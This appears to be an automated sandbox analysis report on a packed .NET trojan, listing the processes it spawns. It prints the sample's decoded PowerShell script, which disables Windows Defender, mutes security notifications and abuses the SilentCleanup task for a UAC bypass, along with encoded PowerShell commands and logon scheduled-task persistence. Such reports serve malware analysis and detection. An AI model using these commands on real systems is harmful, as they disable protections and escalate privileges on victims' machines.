0;$AveYo='+$nfo+';$env:1='+$env:1; $env:__COMPAT_LAYER='Installer'$script+=';iex((gp Registry::HKEY_Users\S-1-5-21\Volatile ToggleDefender -ea 0)[0].ToggleDefender)}'; $cmd='powershell '+$scriptif ($u -eq 0) { start powershell -args $script -verb runas -win 1; break}if ($u -eq 1) { if ($flaw.
Source: C:\Users\user\AppData\Roaming\Loader.exe	Process created: Base64 decoded @(echo off%)[1]sp 'HKCU:\Volatile Environment' 'ToggleDefender' @'if ($(sc.exe qc windefend) -like 'TOGGLE') {$TOGGLE=7;$KEEP=6;$A='Enable';$S='OFF'}else{$TOGGLE=6;$KEEP=7;$A='Disable';$S='ON'}if ($env:1 -ne 6 -and $env:1 -ne 7) { $env:1=$TOGGLE }start cmd -args '/d/r SecurityHealthSystray & "%ProgramFiles%\Windows Defender\MSASCuiL.exe"' -win 1$notif='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Notifications\Settings\Windows.SystemToast.SecurityAndMaintenance'ni $notif -ea 0\|out-null; ri $notif.replace('Settings','Current') -Recurse -Force -ea 0sp $notif Enabled 0 -Type Dword -Force -ea 0; if ($TOGGLE -eq 7) {rp $notif Enabled -Force -ea 0}$ts=New-Object -ComObject 'Schedule.Service'; $ts.Connect(); $baffling=$ts.GetFolder('\Microsoft\Windows\DiskCleanup')$bpass=$baffling.GetTask('SilentCleanup'); $flaw=$bpass.Definition$u=0;$w=whoami /groups;if($w-like'1-5-32-544'){$u=1};if($w-like'1-16-12288'){$u=2};if($w-like'1-16-16384'){$u=3}$r=[char]13; $nfo=[char]39+$r+' (\ /)'+$r+'( * . * ) A limited account protects you from UAC exploits'+$r+' ```'+$r+[char]39$script='-nop -win 1 -c & {rp hkcu:\environment windir -ea 0;$AveYo='+$nfo+';$env:1='+$env:1; $env:__COMPAT_LAYER='Installer'$script+=';iex((gp Registry::HKEY_Users\S-1-5-21\Volatile ToggleDefender -ea 0)[0].ToggleDefender)}'; $cmd='powershell '+$scriptif ($u -eq 0) { start powershell -args $script -verb runas -win 1; break}if ($u -eq 1) { if ($flaw.
Source: C:\Users\user\AppData\Roaming\Loader.exe	Process created: Base64 decoded @(echo off%)[1]sp 'HKCU:\Volatile Environment' 'ToggleDefender' @'if ($(sc.exe qc windefend) -like 'TOGGLE') {$TOGGLE=7;$KEEP=6;$A='Enable';$S='OFF'}else{$TOGGLE=6;$KEEP=7;$A='Disable';$S='ON'}if ($env:1 -ne 6 -and $env:1 -ne 7) { $env:1=$TOGGLE }start cmd -args '/d/r SecurityHealthSystray & "%ProgramFiles%\Windows Defender\MSASCuiL.exe"' -win 1$notif='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Notifications\Settings\Windows.SystemToast.SecurityAndMaintenance'ni $notif -ea 0\|out-null; ri $notif.replace('Settings','Current') -Recurse -Force -ea 0sp $notif Enabled 0 -Type Dword -Force -ea 0; if ($TOGGLE -eq 7) {rp $notif Enabled -Force -ea 0}$ts=New-Object -ComObject 'Schedule.Service'; $ts.Connect(); $baffling=$ts.GetFolder('\Microsoft\Windows\DiskCleanup')$bpass=$baffling.GetTask('SilentCleanup'); $flaw=$bpass.Definition$u=0;$w=whoami /groups;if($w-like'1-5-32-544'){$u=1};if($w-like'1-16-12288'){$u=2};if($w-like'1-16-16384'){$u=3}$r=[char]13; $nfo=[char]39+$r+' (\ /)'+$r+'( * . * ) A limited account protects you from UAC exploits'+$r+' ```'+$r+[char]39$script='-nop -win 1 -c & {rp hkcu:\environment windir -ea 0;$AveYo='+$nfo+';$env:1='+$env:1; $env:__COMPAT_LAYER='Installer'$script+=';iex((gp Registry::HKEY_Users\S-1-5-21\Volatile ToggleDefender -ea 0)[0].ToggleDefender)}'; $cmd='powershell '+$scriptif ($u -eq 0) { start powershell -args $script -verb runas -win 1; break}if ($u -eq 1) { if ($flaw.

Creates a process in suspended mode (likely to inject code)

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe	Process created: C:\Users\user\AppData\Local\Temp\Client.exe "C:\Users\user\AppData\Local\Temp\Client.exe"	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe	Process created: C:\Users\user\AppData\Local\Temp\Infected.exe "C:\Users\user\AppData\Local\Temp\Infected.exe"	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe	Process created: C:\Users\user\AppData\Local\Temp\WinDefend.exe "C:\Users\user\AppData\Local\Temp\WinDefend.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Client.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Loader" /tr '"C:\Users\user\AppData\Roaming\Loader.exe"' & exit	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Client.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmpF879.tmp.bat""	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Infected.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Loaader" /tr '"C:\Users\user\AppData\Roaming\Loaader.exe"' & exit	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Infected.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmpF85A.tmp.bat""	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "Loaader" /tr '"C:\Users\user\AppData\Roaming\Loaader.exe"'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "Loader" /tr '"C:\Users\user\AppData\Roaming\Loader.exe"'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\timeout.exe timeout 3
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Roaming\Loaader.exe "C:\Users\user\AppData\Roaming\Loaader.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\timeout.exe timeout 3
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Roaming\Loader.exe "C:\Users\user\AppData\Roaming\Loader.exe"
Source: C:\Users\user\AppData\Roaming\Loader.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc QAAoAGUAYwBoAG8AIABvAGYAZgAlACkAWwAxAF0ADQAKAHMAcAAgACcASABLAEMAVQA6AFwAVgBvAGwAYQB0AGkAbABlACAARQBuAHYAaQByAG8AbgBtAGUAbgB0ACcAIAAnAFQAbwBnAGcAbABlAEQAZQBmAGUAbgBkAGUAcgAnACAAQAAnAA0ACgBpAGYAIAAoACQAKABzAGMALgBlAHgAZQAgAHEAYwAgAHcAaQBuAGQAZQBmAGUAbgBkACkAIAAtAGwAaQBrAGUAIAAnACoAVABPAEcARwBMAEUAKgAnACkAIAB7ACQAVABPAEcARwBMAEUAPQA3ADsAJABLAEUARQBQAD0ANgA7ACQAQQA9ACcARQBuAGEAYgBsAGUAJwA7ACQAUwA9ACcATwBGAEYAJwB9AGUAbABzAGUAewAkAFQATwBHAEcATABFAD0ANgA7ACQASwBFAEUAUAA9ADcAOwAkAEEAPQAnAEQAaQBzAGEAYgBsAGUAJwA7ACQAUwA9ACcATwBOACcAfQANAAoADQAKAGkAZgAgACgAJABlAG4AdgA6ADEAIAAtAG4AZQAgADYAIAAtAGEAbgBkACAAJABlAG4AdgA6ADEAIAAtAG4AZQAgADcAKQAgAHsAIAAkAGUAbgB2ADoAMQA9ACQAVABPAEcARwBMAEUAIAB9AA0ACgANAAoAcwB0AGEAcgB0ACAAYwBtAGQAIAAtAGEAcgBnAHMAIAAnAC8AZAAvAHIAIABTAGUAYwB1AHIAaQB0AHkASABlAGEAbAB0AGgAUwB5AHMAdAByAGEAeQAgACYAIAAiACUAUAByAG8AZwByAGEAbQBGAGkAbABlAHMAJQBcAFcAaQBuAGQAbwB3AHMAIABEAGUAZgBlAG4AZABlAHIAXABNAFMAQQBTAEMAdQBpAEwALgBlAHgAZQAiACcAIAAtAHcAaQBuACAAMQANAAoADQAKACQAbgBvAHQAaQBmAD0AJwBIAEsAQwBVADoAXABTAE8ARgBUAFcAQQBSAEUAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABDAHUAcgByAGUAbgB0AFYAZQByAHMAaQBvAG4AXABOAG8AdABpAGYAaQBjAGEAdABpAG8AbgBzAFwAUwBlAHQAdABpAG4AZwBzAFwAVwBpAG4AZABvAHcAcwAuAFMAeQBzAHQAZQBtAFQAbwBhAHMAdAAuAFMAZQBjAHUAcgBpAHQAeQBBAG4AZABNAGEAaQBuAHQAZQBuAGEAbgBjAGUAJwANAAoAbgBpACAAJABuAG8AdABpAGYAIAAtAGUAYQAgADAAfABvAHUAdAAtAG4AdQBsAGwAOwAgAHIAaQAgACQAbgBvAHQAaQBmAC4AcgBlAHAAbABhAGMAZQAoACcAUwBlAHQAdABpAG4AZwBzACcALAAnAEMAdQByAHIAZQBuAHQAJwApACAALQBSAGUAYwB1AHIAcwBlACAALQBGAG8AcgBjAGUAIAAtAGUAYQAgADAADQAKAHMAcAAgACQAbgBvAHQAaQBmACAARQBuAGEAYgBsAGUAZAAgADAAIAAtAFQAeQBwAGUAIABEAHcAbwByAGQAIAAtAEYAbwByAGMAZQAgAC0AZQBhACAAMAA7ACAAaQBmACAAKAAkAFQATwBHAEcATABFACAALQBlAHEAIAA3ACkAIAB7AHIAcAAgACQAbgBvAHQAaQBmACAARQBuAGEAYgBsAGUAZAAgAC0ARgBvAHIAYwBlACAALQBlAGEAIAAwAH0ADQAKAA0ACgAkAHQAcwA9AE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAEMAbwBtAE8AYgBqAGUAYwB0ACAAJwBTAGMAaABlAGQAdQBsAGUALgBTAGUAcgB2AGkAYwBlACcAOwAgACQAdABzAC4AQwBvAG4AbgBlAGMAdAAoACkAOwAgACQAYgBhAGYAZgBsAGkAbgBnAD0AJAB0AHMALgBHAGUAdABGAG8AbABkAGUAcgAoACcAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABEAGkAcwBrAEMAbABlAGEAbgB1AHAAJwApAA0ACgAkAGIAcABhAHMAcwA9ACQAYgBhAGYAZgBsAGkAbgBnAC4ARwBlAHQAVABhAHMAawAoACcAUwBpAGwAZQBuAHQAQwBsAGUAYQBuAHUAcAAnACkAOwAgACQAZgBsAGEAdwA9ACQAYgBwAGEAcwBzAC4ARABlAGYAaQBuAGkAdABpAG8AbgANAAoADQAKACQAdQA9ADAAOwAkAHcAPQB3AGgAbwBhAG0AaQAgAC8AZwByAG8AdQBwAHMAOwBpAGYAKAAkAHcALQBsAGkAawBlACcAKgAxAC0ANQAtADMAMgAtADUANAA0ACoAJwApAHsAJAB1AD0AMQB9ADsAaQBmACgAJAB3AC0AbABpAGsAZQAnACoAMQAtADEANgAtADEAMgAyADgAOAAqACcAKQB7ACQAdQA9ADIAfQA7AGkAZgAoACQAdwAtAGwAaQBrAGUAJwAqADEALQAxADYALQAxADYAMwA4ADQAKgAnACkAewAkAHUAPQAzAH0ADQAKAA0ACgAkAHIAPQBbAGMAaABhAHIAXQAxADMAOwAgACQAbgBmAG8APQBbAGMAaABhAHIAXQAzADkAKwAkAHIAKwAnACAAKABcACAAIAAgAC8AKQAnACsAJAByACsAJwAoACAAKgAgAC4AIAAqACAAKQAgACAAQQAgAGwAaQBtAGkAdABlAGQAIABhAGMAYwBvAHUAbgB0ACAAcAByAG8AdABlAGMAdABzACAAeQBvAHUAIABmA
Source: C:\Users\user\AppData\Roaming\Loader.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc QAAoAGUAYwBoAG8AIABvAGYAZgAlACkAWwAxAF0ADQAKAHMAcAAgACcASABLAEMAVQA6AFwAVgBvAGwAYQB0AGkAbABlACAARQBuAHYAaQByAG8AbgBtAGUAbgB0ACcAIAAnAFQAbwBnAGcAbABlAEQAZQBmAGUAbgBkAGUAcgAnACAAQAAnAA0ACgBpAGYAIAAoACQAKABzAGMALgBlAHgAZQAgAHEAYwAgAHcAaQBuAGQAZQBmAGUAbgBkACkAIAAtAGwAaQBrAGUAIAAnACoAVABPAEcARwBMAEUAKgAnACkAIAB7ACQAVABPAEcARwBMAEUAPQA3ADsAJABLAEUARQBQAD0ANgA7ACQAQQA9ACcARQBuAGEAYgBsAGUAJwA7ACQAUwA9ACcATwBGAEYAJwB9AGUAbABzAGUAewAkAFQATwBHAEcATABFAD0ANgA7ACQASwBFAEUAUAA9ADcAOwAkAEEAPQAnAEQAaQBzAGEAYgBsAGUAJwA7ACQAUwA9ACcATwBOACcAfQANAAoADQAKAGkAZgAgACgAJABlAG4AdgA6ADEAIAAtAG4AZQAgADYAIAAtAGEAbgBkACAAJABlAG4AdgA6ADEAIAAtAG4AZQAgADcAKQAgAHsAIAAkAGUAbgB2ADoAMQA9ACQAVABPAEcARwBMAEUAIAB9AA0ACgANAAoAcwB0AGEAcgB0ACAAYwBtAGQAIAAtAGEAcgBnAHMAIAAnAC8AZAAvAHIAIABTAGUAYwB1AHIAaQB0AHkASABlAGEAbAB0AGgAUwB5AHMAdAByAGEAeQAgACYAIAAiACUAUAByAG8AZwByAGEAbQBGAGkAbABlAHMAJQBcAFcAaQBuAGQAbwB3AHMAIABEAGUAZgBlAG4AZABlAHIAXABNAFMAQQBTAEMAdQBpAEwALgBlAHgAZQAiACcAIAAtAHcAaQBuACAAMQANAAoADQAKACQAbgBvAHQAaQBmAD0AJwBIAEsAQwBVADoAXABTAE8ARgBUAFcAQQBSAEUAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABDAHUAcgByAGUAbgB0AFYAZQByAHMAaQBvAG4AXABOAG8AdABpAGYAaQBjAGEAdABpAG8AbgBzAFwAUwBlAHQAdABpAG4AZwBzAFwAVwBpAG4AZABvAHcAcwAuAFMAeQBzAHQAZQBtAFQAbwBhAHMAdAAuAFMAZQBjAHUAcgBpAHQAeQBBAG4AZABNAGEAaQBuAHQAZQBuAGEAbgBjAGUAJwANAAoAbgBpACAAJABuAG8AdABpAGYAIAAtAGUAYQAgADAAfABvAHUAdAAtAG4AdQBsAGwAOwAgAHIAaQAgACQAbgBvAHQAaQBmAC4AcgBlAHAAbABhAGMAZQAoACcAUwBlAHQAdABpAG4AZwBzACcALAAnAEMAdQByAHIAZQBuAHQAJwApACAALQBSAGUAYwB1AHIAcwBlACAALQBGAG8AcgBjAGUAIAAtAGUAYQAgADAADQAKAHMAcAAgACQAbgBvAHQAaQBmACAARQBuAGEAYgBsAGUAZAAgADAAIAAtAFQAeQBwAGUAIABEAHcAbwByAGQAIAAtAEYAbwByAGMAZQAgAC0AZQBhACAAMAA7ACAAaQBmACAAKAAkAFQATwBHAEcATABFACAALQBlAHEAIAA3ACkAIAB7AHIAcAAgACQAbgBvAHQAaQBmACAARQBuAGEAYgBsAGUAZAAgAC0ARgBvAHIAYwBlACAALQBlAGEAIAAwAH0ADQAKAA0ACgAkAHQAcwA9AE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAEMAbwBtAE8AYgBqAGUAYwB0ACAAJwBTAGMAaABlAGQAdQBsAGUALgBTAGUAcgB2AGkAYwBlACcAOwAgACQAdABzAC4AQwBvAG4AbgBlAGMAdAAoACkAOwAgACQAYgBhAGYAZgBsAGkAbgBnAD0AJAB0AHMALgBHAGUAdABGAG8AbABkAGUAcgAoACcAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABEAGkAcwBrAEMAbABlAGEAbgB1AHAAJwApAA0ACgAkAGIAcABhAHMAcwA9ACQAYgBhAGYAZgBsAGkAbgBnAC4ARwBlAHQAVABhAHMAawAoACcAUwBpAGwAZQBuAHQAQwBsAGUAYQBuAHUAcAAnACkAOwAgACQAZgBsAGEAdwA9ACQAYgBwAGEAcwBzAC4ARABlAGYAaQBuAGkAdABpAG8AbgANAAoADQAKACQAdQA9ADAAOwAkAHcAPQB3AGgAbwBhAG0AaQAgAC8AZwByAG8AdQBwAHMAOwBpAGYAKAAkAHcALQBsAGkAawBlACcAKgAxAC0ANQAtADMAMgAtADUANAA0ACoAJwApAHsAJAB1AD0AMQB9ADsAaQBmACgAJAB3AC0AbABpAGsAZQAnACoAMQAtADEANgAtADEAMgAyADgAOAAqACcAKQB7ACQAdQA9ADIAfQA7AGkAZgAoACQAdwAtAGwAaQBrAGUAJwAqADEALQAxADYALQAxADYAMwA4ADQAKgAnACkAewAkAHUAPQAzAH0ADQAKAA0ACgAkAHIAPQBbAGMAaABhAHIAXQAxADMAOwAgACQAbgBmAG8APQBbAGMAaABhAHIAXQAzADkAKwAkAHIAKwAnACAAKABcACAAIAAgAC8AKQAnACsAJAByACsAJwAoACAAKgAgAC4AIAAqACAAKQAgACAAQQAgAGwAaQBtAGkAdABlAGQAIABhAGMAYwBvAHUAbgB0ACAAcAByAG8AdABlAGMAdABzACAAeQBvAHUAIABmA
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Process created: C:\Windows\System32\net1.exe "C:\Windows\system32\net1.exe" start TrustedInstaller
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Process created: unknown unknown
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\whoami.exe "C:\Windows\system32\whoami.exe" /groups
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /d/r SecurityHealthSystray & "%ProgramFiles%\Windows Defender\MSASCuiL.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\whoami.exe "C:\Windows\system32\whoami.exe" /groups
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\net1.exe "C:\Windows\system32\net1.exe" start TrustedInstaller
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\net1.exe "C:\Windows\system32\net1.exe" start lsass
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\sc.exe "C:\Windows\system32\sc.exe" qc windefend
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /d/r SecurityHealthSystray & "%ProgramFiles%\Windows Defender\MSASCuiL.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\whoami.exe "C:\Windows\system32\whoami.exe" /groups
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\net1.exe "C:\Windows\system32\net1.exe" start TrustedInstaller
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\net1.exe "C:\Windows\system32\net1.exe" start lsass
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\SecurityHealthSystray.exe SecurityHealthSystray
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\SecurityHealthSystray.exe SecurityHealthSystray
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\sc.exe "C:\Windows\system32\sc.exe" qc windefend
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /d/r SecurityHealthSystray & "%ProgramFiles%\Windows Defender\MSASCuiL.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\whoami.exe "C:\Windows\system32\whoami.exe" /groups
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\net1.exe "C:\Windows\system32\net1.exe" stop windefend
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\sc.exe "C:\Windows\system32\sc.exe" qc windefend
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /d/r SecurityHealthSystray & "%ProgramFiles%\Windows Defender\MSASCuiL.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\whoami.exe "C:\Windows\system32\whoami.exe" /groups
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\net1.exe "C:\Windows\system32\net1.exe" stop windefend
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\SecurityHealthSystray.exe SecurityHealthSystray
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\SecurityHealthSystray.exe SecurityHealthSystray

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Source: C:\Users\user\AppData\Roaming\Loader.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -enc qaaoaguaywboag8aiabvagyazgalackawwaxaf0adqakahmacaagaccasablaemavqa6afwavgbvagwayqb0agkabablacaarqbuahyaaqbyag8abgbtaguabgb0accaiaanafqabwbnagcabablaeqazqbmaguabgbkaguacganacaaqaanaa0acgbpagyaiaaoacqakabzagmalgblahgazqagaheaywagahcaaqbuagqazqbmaguabgbkackaiaatagwaaqbraguaiaanacoavabpaecarwbmaeuakganackaiab7acqavabpaecarwbmaeuapqa3adsajablaeuarqbqad0anga7acqaqqa9accarqbuageaygbsaguajwa7acqauwa9accatwbgaeyajwb9aguababzaguaewakafqatwbhaecatabfad0anga7acqaswbfaeuauaa9adcaowakaeeapqanaeqaaqbzageaygbsaguajwa7acqauwa9accatwboaccafqanaaoadqakagkazgagacgajablag4adga6adeaiaatag4azqagadyaiaatageabgbkacaajablag4adga6adeaiaatag4azqagadcakqagahsaiaakaguabgb2adoamqa9acqavabpaecarwbmaeuaiab9aa0acganaaoacwb0ageacgb0acaaywbtagqaiaatageacgbnahmaiaanac8azaavahiaiabtaguaywb1ahiaaqb0ahkasablageabab0aggauwb5ahmadabyageaeqagacyaiaaiacuauabyag8azwbyageabqbgagkabablahmajqbcafcaaqbuagqabwb3ahmaiabeaguazgblag4azablahiaxabnafmaqqbtaemadqbpaewalgblahgazqaiaccaiaatahcaaqbuacaamqanaaoadqakacqabgbvahqaaqbmad0ajwbiaesaqwbvadoaxabtae8argbuafcaqqbsaeuaxabnagkaywbyag8acwbvagyadabcafcaaqbuagqabwb3ahmaxabdahuacgbyaguabgb0afyazqbyahmaaqbvag4axaboag8adabpagyaaqbjageadabpag8abgbzafwauwblahqadabpag4azwbzafwavwbpag4azabvahcacwauafmaeqbzahqazqbtafqabwbhahmadaauafmazqbjahuacgbpahqaeqbbag4azabnageaaqbuahqazqbuageabgbjaguajwanaaoabgbpacaajabuag8adabpagyaiaataguayqagadaafabvahuadaatag4adqbsagwaowagahiaaqagacqabgbvahqaaqbmac4acgblahaababhagmazqaoaccauwblahqadabpag4azwbzaccalaanaemadqbyahiazqbuahqajwapacaalqbsaguaywb1ahiacwblacaalqbgag8acgbjaguaiaataguayqagadaadqakahmacaagacqabgbvahqaaqbmacaarqbuageaygbsaguazaagadaaiaatafqaeqbwaguaiabeahcabwbyagqaiaataeyabwbyagmazqagac0azqbhacaamaa7acaaaqbmacaakaakafqatwbhaecatabfacaalqblaheaiaa3ackaiab7ahiacaagacqabgbvahqaaqbmacaarqbuageaygbsaguazaagac0argbvahiaywblacaalqblageaiaawah0adqakaa0acgakahqacwa9ae4azqb3ac0atwbiagoazqbjahqaiaataemabwbtae8aygbqaguaywb0acaajwbtagmaaablagqadqbsagualgbtaguacgb2agkaywblaccaowagacqadabzac4aqwbvag4abgblagmadaaoackaowagacqaygbhagyazgbsagkabgbnad0ajab0ahmalgbhaguadabgag8ababkaguacgaoaccaxabnagkaywbyag8acwbvagyadabcafcaaqbuagqabwb3ahmaxabeagkacwbraemabablageabgb1ahaajwapaa0acgakagiacabhahmacwa9acqaygbhagyazgbsagkabgbnac4arwblahqavabhahmaawaoaccauwbpagwazqbuahqaqwbsaguayqbuahuacaanackaowagacqazgbsageadwa9acqaygbwageacwbzac4arablagyaaqbuagkadabpag8abganaaoadqakacqadqa9adaaowakahcapqb3aggabwbhag0aaqagac8azwbyag8adqbwahmaowbpagyakaakahcalqbsagkaawblaccakgaxac0anqatadmamgataduanaa0acoajwapahsajab1ad0amqb9adsaaqbmacgajab3ac0ababpagsazqanacoamqatadeangatadeamgayadgaoaaqaccakqb7acqadqa9adiafqa7agkazgaoacqadwatagwaaqbraguajwaqadealqaxadyalqaxadyamwa4adqakganackaewakahuapqazah0adqakaa0acgakahiapqbbagmaaabhahiaxqaxadmaowagacqabgbmag8apqbbagmaaabhahiaxqazadkakwakahiakwanacaakabcacaaiaagac8akqanacsajabyacsajwaoacaakgagac4aiaaqacaakqagacaaqqagagwaaqbtagkadablagqaiabhagmaywbvahuabgb0acaacabyag8adablagmadabzacaaeqbvahuaiabma
Source: C:\Users\user\AppData\Roaming\Loader.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -enc qaaoaguaywboag8aiabvagyazgalackawwaxaf0adqakahmacaagaccasablaemavqa6afwavgbvagwayqb0agkabablacaarqbuahyaaqbyag8abgbtaguabgb0accaiaanafqabwbnagcabablaeqazqbmaguabgbkaguacganacaaqaanaa0acgbpagyaiaaoacqakabzagmalgblahgazqagaheaywagahcaaqbuagqazqbmaguabgbkackaiaatagwaaqbraguaiaanacoavabpaecarwbmaeuakganackaiab7acqavabpaecarwbmaeuapqa3adsajablaeuarqbqad0anga7acqaqqa9accarqbuageaygbsaguajwa7acqauwa9accatwbgaeyajwb9aguababzaguaewakafqatwbhaecatabfad0anga7acqaswbfaeuauaa9adcaowakaeeapqanaeqaaqbzageaygbsaguajwa7acqauwa9accatwboaccafqanaaoadqakagkazgagacgajablag4adga6adeaiaatag4azqagadyaiaatageabgbkacaajablag4adga6adeaiaatag4azqagadcakqagahsaiaakaguabgb2adoamqa9acqavabpaecarwbmaeuaiab9aa0acganaaoacwb0ageacgb0acaaywbtagqaiaatageacgbnahmaiaanac8azaavahiaiabtaguaywb1ahiaaqb0ahkasablageabab0aggauwb5ahmadabyageaeqagacyaiaaiacuauabyag8azwbyageabqbgagkabablahmajqbcafcaaqbuagqabwb3ahmaiabeaguazgblag4azablahiaxabnafmaqqbtaemadqbpaewalgblahgazqaiaccaiaatahcaaqbuacaamqanaaoadqakacqabgbvahqaaqbmad0ajwbiaesaqwbvadoaxabtae8argbuafcaqqbsaeuaxabnagkaywbyag8acwbvagyadabcafcaaqbuagqabwb3ahmaxabdahuacgbyaguabgb0afyazqbyahmaaqbvag4axaboag8adabpagyaaqbjageadabpag8abgbzafwauwblahqadabpag4azwbzafwavwbpag4azabvahcacwauafmaeqbzahqazqbtafqabwbhahmadaauafmazqbjahuacgbpahqaeqbbag4azabnageaaqbuahqazqbuageabgbjaguajwanaaoabgbpacaajabuag8adabpagyaiaataguayqagadaafabvahuadaatag4adqbsagwaowagahiaaqagacqabgbvahqaaqbmac4acgblahaababhagmazqaoaccauwblahqadabpag4azwbzaccalaanaemadqbyahiazqbuahqajwapacaalqbsaguaywb1ahiacwblacaalqbgag8acgbjaguaiaataguayqagadaadqakahmacaagacqabgbvahqaaqbmacaarqbuageaygbsaguazaagadaaiaatafqaeqbwaguaiabeahcabwbyagqaiaataeyabwbyagmazqagac0azqbhacaamaa7acaaaqbmacaakaakafqatwbhaecatabfacaalqblaheaiaa3ackaiab7ahiacaagacqabgbvahqaaqbmacaarqb